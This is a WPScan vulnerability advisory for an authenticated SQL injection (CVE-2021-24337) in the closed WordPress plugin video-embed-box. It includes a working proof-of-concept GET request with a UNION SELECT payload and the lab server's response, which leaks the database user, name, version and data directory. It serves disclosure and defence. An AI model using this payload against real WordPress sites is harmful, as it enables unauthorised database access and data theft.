WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Video Embed <= 1.0 - Authenticated (subscriber+) SQL Injection

Description

The id GET parameter of one of the plugin's page (available via forced browsing) is not sanitised, validated or escaped before being used in a SQL statement, allowing low privilege users, such as subscribers, to perform SQL injection.

Proof of Concept

Note: The URL /wp-admin/admin.php?page=edit-video-embed&id=1 is not directly in the menu but can be accessed by forced browsing.


GET http://172.28.128.50/wp-admin/admin.php?page=edit-video-embed&id=0+union+select+1%2Ccurrent_user%28%29%2C3%2Cdatabase%28%29%2C%40%40version%2C6%[email protected]@datadir%3B HTTP/1.1
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [subscriber+]
Host: 172.28.128.50


Response

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Apr 2021 00:25:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: wp-settings-4=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: wp-settings-time-4=1618619143; expires=Sun, 17-Apr-2022 00:25:43 GMT; Max-Age=31536000; path=/

<...... snip ......>
				<form action="" method="post" name="video_embed" style="float: left; width: 100%;" id="video_embed">
			<table>
				<tr>
					<td>Title: </td>
					<td><input type="text" name="title" value="[email protected]" /></td>
				</tr>
				<tr style="height: 50px;">
					<td>Video from: </td>
					<td>
						<input type="radio" name="video_embed_for"  value="youtube" /> Youtube / Vimeo
						<input type="radio" name="video_embed_for"  value="videosuit" /> VideoSuit
					</td>
				</tr>
				<tr>
					<td>Youtube Embed Url: </td>
					<td>
						<input type="text" name="url" value="wp"/>
												<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
					</td>
				</tr>
				<tr>
					<td>Pdf Path: </td>
					<td><input type="text" name="pdf" value="8.0.23-0ubuntu0.20.04.1" /></td>
					<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
				</tr>
				<tr>
					<td>Audio Path: </td>
					<td><input type="text" name="audio" value="6" /></td>
					<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
				</tr>
				<tr>
					<td>Useful Link: </td>
					<td><textarea name="useful_link">/var/lib/mysql/</textarea></td>
					<td><p style="font-size: 11px;">Please specify your html content</p></td>
				</tr>
				<tr>
					<td><input type="submit" value="Save"/>
					<td><input type="hidden" name="saved" value="1" /></td>
				</tr>
			</table>
		</form>
	</div>

<div class="clear"></div></div><!-- wpbody-content -->

<...... snip ......> 

Affects Plugins

video-embed-box
No known fix - plugin closed

References

CVE
CVE-2021-24337
URL
https://codevigilant.com/disclosure/2021/wp-plugin-video-embed-box/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Syed Sheeraz Ali of Code Vigilant Project

Verified

Yes

WPVDB ID
a8fd8dd4-5b5e-462e-8dae-065d5e2d003a

Timeline

Publicly Published

2021-05-19 (about 2 years ago)

Added

2021-05-19 (about 2 years ago)

Last Updated

2021-05-21 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us